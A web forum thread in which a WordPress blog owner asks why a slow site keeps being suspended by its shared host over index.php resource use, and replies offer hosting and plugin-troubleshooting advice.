Frustrated - Blog always slow and Host always suspending account..index.php to blame they say

Hi guys,

Hope somebody here can help or at least give me a new idea as I'm kind of stuck at the moment.

For the last few months I've been struggling with a ridiculously slow website and everything I've paid a fair bit of money to get it resolved with no luck.

Many of the people I've hired have been pulling their hair out because they can't figure out what is going on. I've had the following done :

Cache plugin installed
WP-Minify installed
Hired many optimisers to check out my files with no luck.

My webhost constantly suspend my account citing that, "Your index.php file is using a script that is using up too many resources"

I have no clue what script they are referring to.

My host is webhostingpad and my url is loseweightbuildmuscles.com

I am currently using the Profits Theme and have currently disabled most plugins to see if it helped. I don't think it has..I've also changed my theme to the default theme.

If anybody can give me any idea's I'd be massively appreciative. I can't seem to access my website from my work..I get a forbidden error..hopefully you guys can have a look.

Thanks a bunch

Altug

      Altug,

I am getting the same error - 403 Forbidden.

Sounds like an implementation issue. However, I would try backing up your existing site and hosting it with another web hosting company (temporary domain maybe with a hyphen in the name) and see if you get the same issues.

If so, you know its something in your implementation of WP. If not, its most likely your choice of Web Hosting companies. I have found that SHARED Hosting environments (while cheap) cost you much more that VIRTUAL PRIVATE SERVER Hosting environments in the long run. So as you can imagine -- I would recommend considering a VPS Hosting environment so you you eliminate the risk of other sites impacting your sites in the future.

      Best of luck.

Yes...you are probably hosting on a shared reseller account which are very low resource wise (despite the promises of unlimited bandwidth, unlimited transfer..etc..). You are better off in the long run with a dedicated server for your main websites and then a small group of cheap side accounts for your inbound links...I wrote an article about choosing web hosting that covers this very topic. You can find it at hostinghosting.org if you like.

There is a chance a database issue is eating up resources. I had a gaming site once that would load large log files and covert them into stats and did this for 4 sites. Then I got the same sort of response from the web host that you did. You can look into tools your host provides that can show you process data so you can monitor what is happening. You can also use the terminal to do this.

You can also contact your host and ask them to send you the info on your processes if things get out of hand again. Tell them you want to see a screenshot or copy of the text from the terminal showing what process is hogging resources.

It sounds like you're using WordPress, if so then index.php is just the main file that runs the site. So the information your host provided is really of little use. I'm with jmartinez - ask to see which process is really hogging the CPU resources.

Personally I think you're approaching it from the wrong direction. Instead of adding plugins like a cache I would be looking to remove plugins to see which one is causing the actual problem.

After making a complete (file & database) backup of your site you could either (a) remove plugins until the problem clears or (b) remove them all, verify it is OK and then start adding them. Again getting detailed CPU information from your host would be useful here.

Another way of approaching this is to temporarily install another virgin copy of WordPress in a subdirectory. Verify all is well then start adding the same plugins, themes and other modifications, duplication your problematic site. Eventually you should hit upon the thing that is slowing your site down.

Talk of new hosting is fine, and may indeed help, but I believe you first need to get to the real root of the problem and resolve it.

I would definitely go through each plugin and disable one a time. After each, contact you host and ask them to check the resource usage at that time. This may narrow down the plugin that is causing the overload. In most all cases, its an out of control plugin.

Check error logs as well just in case this gives you any indication of what is going wrong, assuming you have access to this.

      Awesome guys, really appreciate this.

I'm with you, Bill. Everyone keeps telling me to change hosts but if the problem isn't hosting related, it's a waste of my time!

I've asked them so many times for specifics but they don't seem to want to give me anything but "it's a script on the index.php file" - Is there a way that I can go in myself and have a look? Is there a log in the cpanel somewhere? Where do I find the error logs?

Initially, when I got somebody to optimise my site with the cache plugins, it seemed to do the trick for a few weeks but now it's gone back to the same deal.

Also I have currently disabled almost all plugins but the problem still persists.

Does anybody know what this random php file is that has appeared in my theme files?

      With this coding :

In cPanel look in the advanced section and see if there is a process manager. If there is you can use that to monitor if something is using up resources. At least you can see what is happening before your host gets involved and it could give you more info regarding what's happening.

As for your logs, just look in the logs section of cPanel. You can look at your error log, but this doesn't sound like a problem with apache (your web server). Some errors are normal.

I'm not familiar enough with this temp file to know if it is needed or not. But, I would remove it since it doesn't look like something I'd trust. You can always copy it back if something breaks.

The main thing is you want to isolate what is using up resources. It may take some trial and error to figure it out. Updating everything may not be a bad idea either as long as you have backed everything up first.

Just to let you know, I went to your site and it is not live right now, it giving me a forbidden message. To answer you question, what I would do is change hosting companies that work, because it seems like this may not be working for you and if it is that much of a hassle why keep going with it. It like the same web owners that get the site banned and keep trying to get it unbanned, well, I tell them every time, forget about it, make a new domain, and start over, just don't make the same mistake again.

Ok thanks guys, looks like Webhostingpad is the problem. I'll check out some things to see if I can fix it but I'm thinking of moving VPS as this shared hosting is costing me more money in the long-term as I can't make money while my site is down obviously!

    Appreciate all the help

    Success to you all
